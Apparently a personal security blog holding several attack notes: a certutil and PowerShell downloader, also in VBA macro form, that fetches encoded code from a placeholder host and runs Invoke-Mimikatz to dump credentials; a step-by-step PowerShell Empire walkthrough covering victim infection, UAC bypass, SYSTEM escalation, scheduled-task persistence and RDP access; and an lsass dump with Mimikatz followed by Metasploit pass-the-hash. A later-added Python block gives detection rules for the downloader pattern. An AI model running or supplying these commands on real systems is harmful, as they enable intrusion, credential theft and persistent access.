
Thursday, January 13, 2022

downloader certutil powershell invoke-mimikatz

Sample downloader that executed Mimikatz


certutil.exe -urlcache -split -f http://somewhere/test.txt 'test.txt';

$B64 = get-content test.txt ;

$clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64));

$clear |out-file -filepath 'test.txt';

powershell -version 2 -command "iex (get-content 'test.txt'|out-string); Invoke-Mimikatz -DumpCreds"


VBA Macro downloader invoke-mimikatz

Shell ("certutil.exe -urlcache -split -f http://somewhere/test4.txt ""tes5.txt""")


Shell ("powershell.exe -noprofile -command ""start-sleep -s 5; $B64 = get-content 'test.txt' ; $clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64)); $clear |out-file -filepath 'test.txt';""")


Shell ("cmd.exe /c ""c:\windows\sysnative\windowspowershell\v1.0\powershell.exe -version 2 -noprofile -noexit -command ""start-sleep -s 15; iex (get-content 'test.txt'|out-string); invoke-mimikatz -command 'token::whoami';""""")
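Added example, not part of the original post: detection logic a defender can run over process-creation telemetry to flag the pattern shown above (certutil used as a downloader, the PowerShell version-2 downgrade, Invoke-Mimikatz in a command line, and an Office parent spawning a shell). The event field names and the sample events are constructed assumptions, not real logs.

```python
"""Flag the downloader/Invoke-Mimikatz pattern in process-creation events."""
import re

# Each rule is (name, regex over the command line). The patterns mirror the
# tradecraft in the post; the event layout (image, parent, cmdline) is assumed.
RULES = [
    ("certutil_download",
     re.compile(r"certutil(?:\.exe)?.*-urlcache.*-f\s+https?://", re.I)),
    ("powershell_v2_downgrade",
     re.compile(r"powershell(?:\.exe)?.*-v(?:ersion)?\s+2\b", re.I)),
    ("invoke_mimikatz", re.compile(r"invoke-mimikatz|sekurlsa::", re.I)),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "certutil.exe"}

def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]

def classify(event: dict) -> list:
    """Return the rule names matched by one event (keys assumed: image, parent, cmdline)."""
    cmd = event.get("cmdline", "")
    hits = [name for name, rx in RULES if rx.search(cmd)]
    # Macro downloader: an Office process launching a shell or certutil.
    if basename(event.get("parent", "")) in OFFICE_PARENTS and \
            basename(event.get("image", "")) in SHELLS:
        hits.append("office_spawns_shell")
    return hits

def scan(events) -> dict:
    """Map event index -> matched rule names, omitting events with no hits."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}

# Constructed sample events modelled on the VBA macro in the post (not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": "certutil.exe -urlcache -split -f http://somewhere/test4.txt tes5.txt"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -version 2 -noprofile -noexit -command "
                "\"iex (get-content 'test.txt'|out-string); invoke-mimikatz -command 'token::whoami';\""},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil.exe -verify cert.cer"},  # benign use, must not match
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, hits)
```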



Friday, February 14, 2020

Powershell Empire common path

Powershell Empire common path in a lab test environment

./empire

1.) set up a listener
listeners
uselistener http
execute

2.) create a stager
usestager multi/launcher
set Listener http
set OutFile /launcher.ps1

3.) set up a web server to serve the malicious launcher
python -m SimpleHTTPServer 8000

4.) infect victim
have the victim PC reach out to the attacker PC, download launcher.ps1, and execute it

5.) interact with agent
**you should see agent check-in as soon as step #4 above is complete
interact XXXXX
rename victim

6.) see where you are
sysinfo
whoami
pwd
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

7.) if not admin, find weaknesses
usemodule privesc/powerup/allchecks
execute

8.) if not admin, use a weakness (perhaps already admin just need uac bypass) to escalate to admin
usemodule privesc/bypassuac_env
set Listener http
execute

9.) interact with admin agent
** if it works, you should get new agent check-in immediately after step #8 that is admin**
interact XXXX
rename victimAsAdmin

10.) see where you are
whoami
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

11.) if admin, move to SYSTEM
usemodule privesc/getsystem
execute

12.) see where you are
whoami    (should say SYSTEM now)

13.) setup persistence as a scheduled task
usemodule persistence/userland/schtasks
set Listener http
set IdleTime 2
execute

14.) run mimikatz
mimikatz

15.) enumerate credential store
usemodule credentials/enum_cred_store
execute

16.) enable remote desktop
usemodule management/enable_rdp
execute

17.) remote desktop into the victim with credentials found

Wednesday, October 2, 2019

Lsass Dump Mimikatz Pass the Hash Basics

procdump -ma lsass.exe {path to where you want it dumped}\lsass.dmp

Mimikatz.exe
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonPasswords

Username : {user}
Domain     : {domain}
NTLM       : {NTLM Hash}

use auxiliary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}
run




good blog

https://blog.ropnop.com/practical-usage-of-ntlm-hashes/

When you can & cannot Pass the Hash

great blog

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

From a pentesting perspective:
  • You CAN perform Pass-The-Hash attacks with NTLM hashes.
  • You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes.
You get NTLM hashes when dumping the SAM database of any Windows OS, a Domain Controller's NTDS.dit database or from Mimikatz (Fun fact, although you can't get clear-text passwords from Mimikatz on Windows >= 8.1 you can get NTLM hashes from memory). Some tools just give you the NT hash (e.g. Mimikatz) and that's perfectly fine: obviously you can still Pass-The-Hash with just the NT hash.
You get Net-NTLMv1/v2 (a.k.a NTLMv1/v2) hashes when using tools like Responder or Inveigh.